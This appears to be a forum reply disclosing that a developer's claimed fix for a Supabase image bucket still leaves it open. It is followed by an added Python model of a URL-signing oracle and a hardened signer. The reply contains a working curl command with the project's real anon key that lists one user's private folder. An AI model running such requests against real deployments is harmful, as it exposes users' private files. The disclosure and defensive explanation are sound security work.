by imgopaal 164 days ago
Also fixed. Images now use signed URLs with 1-year expiration. Public URLs are automatically converted to signed URLs. Storage bucket policies restrict access to user-specific folders. Appreciate you flagging this.

It appears to still be wide open:

  # List the objects under one user's folder in the bucket, authenticating
  # only with the project's publishable anon key (role "anon" in the JWT).
  curl -X POST \
    "https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/list/clipboard-images" \
    -H "authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6IndqeW5tamx1YWJxd3FodGR4YnRsIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NDIzODU1MDQsImV4cCI6MjA1Nzk2MTUwNH0.R6pSgPFgHe3ZU9DfKykE98MC1ObYihWdZuhy9v9Y_p0" \
    -H "content-type: application/json" \
    -d '{"prefix": "7b407af2-f30c-4e37-adc7-b7bf48f2661b"}' \
    | jq
There is also a URL-signing oracle that allows any URL to be signed, so it's still possible to enumerate + download all files.

Example: https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/s...
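To make the "signing oracle" point concrete, here is a small model of the two halves of the problem. This is an added illustration, not code from the thread or from the project; the signing key, user ids, object names and function names are made up. sign_any_path is the oracle: it signs whatever path the caller names, so anyone who can reach it can mint a valid URL for every object, and folder-scoped read policies on the objects themselves buy nothing. sign_own_path is the hardened shape: the caller must be authenticated, may only sign objects under their own folder, and cannot ask for an unbounded expiry. list_objects models what a folder-per-user policy should do to the list call shown above, where the anon role gets nothing back.

```python
import hashlib
import hmac
import time
from urllib.parse import urlencode

# Constructed values for this toy model; a real service keeps the key server-side.
SIGNING_KEY = b"toy-signing-key-for-illustration-only"
MAX_TTL = 365 * 24 * 3600  # one year, the expiry mentioned in the thread

# Constructed bucket contents: objects live under a per-user folder,
# so the first path component is the owner's id.
BUCKET = {
    "user-a/clip.png": b"\x89PNG...",
    "user-a/notes.png": b"\x89PNG...",
    "user-b/secret.png": b"\x89PNG...",
}


def _token(path, expires):
    """HMAC over object path and expiry; this is what a signed URL carries."""
    msg = f"{path}:{expires}".encode()
    return hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()


def _signed(path, expires):
    token = _token(path, expires)
    url = f"/storage/v1/object/sign/{path}?" + urlencode(
        {"expires": expires, "token": token})
    return {"url": url, "path": path, "expires": expires, "token": token}


def sign_any_path(path, ttl=MAX_TTL, now=None):
    """Signing oracle: signs whatever path the caller names, with no check
    on who is asking. Combined with a listable bucket this hands out a
    working download URL for every object."""
    now = int(time.time()) if now is None else now
    return _signed(path, now + ttl)


def sign_own_path(caller_uid, path, ttl=3600, now=None):
    """Hardened variant: authenticated caller, own folder only, capped TTL."""
    if caller_uid is None:
        raise PermissionError("anonymous callers may not sign URLs")
    parts = path.split("/")
    if len(parts) < 2 or parts[0] != caller_uid or "" in parts or ".." in parts:
        raise PermissionError(f"{caller_uid!r} may not sign {path!r}")
    now = int(time.time()) if now is None else now
    return _signed(path, now + min(ttl, MAX_TTL))


def verify_signed(path, expires, token, now=None):
    """Server-side check when a signed URL is fetched: unexpired, MAC matches."""
    now = int(time.time()) if now is None else now
    if now >= expires:
        return False
    return hmac.compare_digest(token, _token(path, expires))


def list_objects(caller_uid, prefix):
    """Models a list endpoint gated by a folder-per-user policy: the anon
    role (caller_uid is None) sees nothing, an authenticated user sees
    only objects under their own folder, whatever prefix they ask for."""
    if caller_uid is None:
        return []
    if prefix.split("/", 1)[0] != caller_uid:
        return []
    match = prefix if "/" in prefix else prefix + "/"
    return sorted(k for k in BUCKET if k.startswith(match))
```

The two things to check on a real deployment follow directly from the model: whether the list call succeeds with the anon key (it should return an empty set or an error), and whether the sign endpoint accepts a path outside the caller's folder (it should refuse). Capping the expiry matters too, because a one-year URL that has already leaked cannot be recalled without rotating the signing key.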